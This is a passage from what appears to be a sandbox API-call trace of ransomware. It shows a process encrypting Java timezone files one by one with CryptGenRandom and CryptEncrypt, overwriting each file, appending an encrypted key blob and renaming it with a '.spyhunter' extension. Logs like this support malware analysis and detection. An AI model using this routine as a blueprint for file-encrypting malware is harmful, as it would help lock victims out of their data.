nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x270e664*, lpNumberOfBytesWritten=0x270e624*=0x4, lpOverlapped=0x0) returned 1 [0169.098] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e624*=0x30, lpOverlapped=0x0) returned 1 [0169.098] CloseHandle (hObject=0x178) returned 1 [0169.098] GetProcessHeap () returned 0x2c0000 [0169.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.098] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.spyhunter") returned 66 [0169.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi.spyhunter")) returned 1 [0169.099] GetProcessHeap () returned 0x2c0000 [0169.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.099] GetProcessHeap () returned 0x2c0000 [0169.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.099] GetProcessHeap () returned 0x2c0000 [0169.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd580 | out: hHeap=0x2c0000) returned 1 [0169.099] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e668 | out: pbBuffer=0x270e668) returned 1 [0169.099] GetProcessHeap () returned 0x2c0000 [0169.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.099] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e660*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e660*=0x30) returned 1 [0169.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent") returned 57 [0169.100] StrStrW (lpFirst="Tashkent", lpSrch=".txt") returned 0x0 [0169.100] GetProcessHeap () returned 0x2c0000 [0169.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.100] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e624*=0x105, lpOverlapped=0x0) returned 1 [0169.101] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.101] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e624*=0x105, lpOverlapped=0x0) returned 1 [0169.101] GetProcessHeap () returned 0x2c0000 [0169.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.101] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.101] WriteFile (in: hFile=0x178, lpBuffer=0x270e664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x270e664*, lpNumberOfBytesWritten=0x270e624*=0x4, lpOverlapped=0x0) returned 1 [0169.101] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e624*=0x30, lpOverlapped=0x0) returned 1 [0169.102] CloseHandle (hObject=0x178) returned 1 [0169.102] GetProcessHeap () returned 0x2c0000 [0169.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.102] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.spyhunter") returned 67 [0169.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent.spyhunter")) returned 1 [0169.102] GetProcessHeap () returned 0x2c0000 [0169.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.102] GetProcessHeap () returned 0x2c0000 [0169.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.102] GetProcessHeap () returned 0x2c0000 [0169.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd4c0 | out: hHeap=0x2c0000) returned 1 [0169.103] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e660 | out: pbBuffer=0x270e660) returned 1 [0169.103] GetProcessHeap () returned 0x2c0000 [0169.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.103] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e658*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e658*=0x30) returned 1 [0169.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.108] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei") returned 55 [0169.119] StrStrW (lpFirst="Taipei", lpSrch=".txt") returned 0x0 [0169.119] GetProcessHeap () returned 0x2c0000 [0169.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.119] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e61c*=0x17d, lpOverlapped=0x0) returned 1 [0169.120] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.120] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x17d, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e61c*=0x17d, lpOverlapped=0x0) returned 1 [0169.120] GetProcessHeap () returned 0x2c0000 [0169.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.121] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.121] WriteFile (in: hFile=0x178, lpBuffer=0x270e65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x270e65c*, lpNumberOfBytesWritten=0x270e61c*=0x4, lpOverlapped=0x0) returned 1 [0169.121] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e61c*=0x30, lpOverlapped=0x0) returned 1 [0169.121] CloseHandle (hObject=0x178) returned 1 [0169.121] GetProcessHeap () returned 0x2c0000 [0169.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.121] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.spyhunter") returned 65 [0169.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei.spyhunter")) returned 1 [0169.122] GetProcessHeap () returned 0x2c0000 [0169.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.122] GetProcessHeap () returned 0x2c0000 [0169.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.122] GetProcessHeap () returned 0x2c0000 [0169.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27aa0 | out: hHeap=0x2c0000) returned 1 [0169.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e660 | out: pbBuffer=0x270e660) returned 1 [0169.122] GetProcessHeap () returned 0x2c0000 [0169.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e658*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e658*=0x30) returned 1 [0169.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.123] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore") returned 58 [0169.123] StrStrW (lpFirst="Singapore", lpSrch=".txt") returned 0x0 [0169.123] GetProcessHeap () returned 0x2c0000 [0169.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.123] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e61c*=0x85, lpOverlapped=0x0) returned 1 [0169.124] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.124] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e61c*=0x85, lpOverlapped=0x0) returned 1 [0169.124] GetProcessHeap () returned 0x2c0000 [0169.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.124] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.124] WriteFile (in: hFile=0x178, lpBuffer=0x270e65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x270e65c*, lpNumberOfBytesWritten=0x270e61c*=0x4, lpOverlapped=0x0) returned 1 [0169.124] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e61c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e61c*=0x30, lpOverlapped=0x0) returned 1 [0169.124] CloseHandle (hObject=0x178) returned 1 [0169.125] GetProcessHeap () returned 0x2c0000 [0169.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.125] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.spyhunter") returned 68 [0169.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore.spyhunter")) returned 1 [0169.125] GetProcessHeap () returned 0x2c0000 [0169.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.126] GetProcessHeap () returned 0x2c0000 [0169.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.126] GetProcessHeap () returned 0x2c0000 [0169.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd400 | out: hHeap=0x2c0000) returned 1 [0169.126] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e658 | out: pbBuffer=0x270e658) returned 1 [0169.126] GetProcessHeap () returned 0x2c0000 [0169.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.126] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e650*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e650*=0x30) returned 1 [0169.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.127] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai") returned 57 [0169.127] StrStrW (lpFirst="Shanghai", lpSrch=".txt") returned 0x0 [0169.127] GetProcessHeap () returned 0x2c0000 [0169.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.127] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e614*=0xc9, lpOverlapped=0x0) returned 1 [0169.128] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.128] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc9, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e614*=0xc9, lpOverlapped=0x0) returned 1 [0169.128] GetProcessHeap () returned 0x2c0000 [0169.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.128] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.128] WriteFile (in: hFile=0x178, lpBuffer=0x270e654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x270e654*, lpNumberOfBytesWritten=0x270e614*=0x4, lpOverlapped=0x0) returned 1 [0169.128] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e614*=0x30, lpOverlapped=0x0) returned 1 [0169.128] CloseHandle (hObject=0x178) returned 1 [0169.128] GetProcessHeap () returned 0x2c0000 [0169.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.128] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.spyhunter") returned 67 [0169.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai.spyhunter")) returned 1 [0169.129] GetProcessHeap () returned 0x2c0000 [0169.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.129] GetProcessHeap () returned 0x2c0000 [0169.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.129] GetProcessHeap () returned 0x2c0000 [0169.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd340 | out: hHeap=0x2c0000) returned 1 [0169.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e658 | out: pbBuffer=0x270e658) returned 1 [0169.130] GetProcessHeap () returned 0x2c0000 [0169.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.130] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e650*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e650*=0x30) returned 1 [0169.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.135] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul") returned 54 [0169.135] StrStrW (lpFirst="Seoul", lpSrch=".txt") returned 0x0 [0169.135] GetProcessHeap () returned 0x2c0000 [0169.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.135] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e614*=0xa5, lpOverlapped=0x0) returned 1 [0169.136] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.136] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e614*=0xa5, lpOverlapped=0x0) returned 1 [0169.136] GetProcessHeap () returned 0x2c0000 [0169.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.136] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.136] WriteFile (in: hFile=0x9c, lpBuffer=0x270e654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x270e654*, lpNumberOfBytesWritten=0x270e614*=0x4, lpOverlapped=0x0) returned 1 [0169.136] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e614, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e614*=0x30, lpOverlapped=0x0) returned 1 [0169.136] CloseHandle (hObject=0x9c) returned 1 [0169.136] GetProcessHeap () returned 0x2c0000 [0169.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.137] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.spyhunter") returned 64 [0169.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul.spyhunter")) returned 1 [0169.137] GetProcessHeap () returned 0x2c0000 [0169.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.137] GetProcessHeap () returned 0x2c0000 [0169.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.137] GetProcessHeap () returned 0x2c0000 [0169.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f279e8 | out: hHeap=0x2c0000) returned 1 [0169.138] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e650 | out: pbBuffer=0x270e650) returned 1 [0169.138] GetProcessHeap () returned 0x2c0000 [0169.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.138] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e648*=0x30) returned 1 [0169.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin") returned 57 [0169.139] StrStrW (lpFirst="Sakhalin", lpSrch=".txt") returned 0x0 [0169.139] GetProcessHeap () returned 0x2c0000 [0169.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.139] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e60c*=0x249, lpOverlapped=0x0) returned 1 [0169.140] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.140] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e60c*=0x249, lpOverlapped=0x0) returned 1 [0169.140] GetProcessHeap () returned 0x2c0000 [0169.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.140] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.140] WriteFile (in: hFile=0x9c, lpBuffer=0x270e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x270e64c*, lpNumberOfBytesWritten=0x270e60c*=0x4, lpOverlapped=0x0) returned 1 [0169.140] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e60c*=0x30, lpOverlapped=0x0) returned 1 [0169.140] CloseHandle (hObject=0x9c) returned 1 [0169.141] GetProcessHeap () returned 0x2c0000 [0169.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.141] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.spyhunter") returned 67 [0169.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin.spyhunter")) returned 1 [0169.215] GetProcessHeap () returned 0x2c0000 [0169.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.215] GetProcessHeap () returned 0x2c0000 [0169.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.215] GetProcessHeap () returned 0x2c0000 [0169.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd1c0 | out: hHeap=0x2c0000) returned 1 [0169.216] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e650 | out: pbBuffer=0x270e650) returned 1 [0169.216] GetProcessHeap () returned 0x2c0000 [0169.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.216] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, 